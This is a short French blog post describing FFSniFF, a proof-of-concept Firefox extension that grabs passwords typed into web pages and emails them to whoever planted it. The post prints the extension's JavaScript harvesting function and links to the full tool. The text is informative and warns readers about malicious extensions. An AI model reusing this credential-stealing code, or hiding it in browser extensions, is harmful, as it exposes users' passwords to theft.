Korben, roi d’internet, logo bébé avec des lunettes en mode thug life Korben, roi d’internet, logo bébé avec des lunettes en mode thug life

Korben Upgrade your mind

FFSniFF, l’extension firefox qui ‘peut’ faire mal

Il s’agit plus d’un proof of concept que d’une vraie extension Firefox destinée à être malveillante mais c’est assez interressant de voir ce qu’il est possible de faire avec ce truc.

Cette extension surveille toutes les pages web visitées et repère les champs de mots de passe que l’utilisateur remplit et se fait un plaisir de l’envoyer par email à la personne qui l’a mise en place…(vous si vous êtes un vilain)

Image Hosted by ImageShack.us

Ca passe par le browser donc ce n’est pas filtré par les antivirus et autres firewall…
Bref cela peut être très dangereux surtout si on imagine que de telles fonctions peuvent être intégrées à une extension banale que vous pouvez télécharger sur un site x ou y.

Voici à titre informatif la fonction qui chope vos passwords:

function do_sniff() {
var ok = 0;
var hesla = window.content.document.getElementsByTagName("input");
data = "";
for (var i = 0; i < hesla.length; i++) {
if (hesla[i].value != "") {
if (hesla[i].type == "password") {
ok = 1;
}
if (hesla[i].name == "") {
data += hesla[i].type + ":" + ":" + hesla[i].value + "n";
}
else {
data += hesla[i].type + ":" + hesla[i].name +":" + hesla[i].value + "n";
}
}
}
if (ok == 1) {
data = "Subject: " + subject + "rnrn" + window.top.content.document.location + "n" + "type:name:valuen" + "---------------n" + data;
sniff()
}
}

Bref, si ça vous interresse, tout est dispo sur ce site.